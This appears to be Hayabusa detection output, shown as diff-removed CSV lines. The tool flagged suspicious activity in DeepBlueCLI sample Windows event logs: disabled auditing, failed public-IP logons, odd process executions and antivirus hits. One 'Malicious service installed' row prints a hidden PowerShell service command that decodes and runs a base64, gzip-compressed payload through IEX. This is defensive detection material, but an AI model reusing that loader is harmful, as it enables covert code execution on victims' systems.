-2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 
+09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event 
Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: SYyGmEHvgHiGYApk : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 07:54:48.533 
+09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Relevant 
Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 
-2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:42:26.373 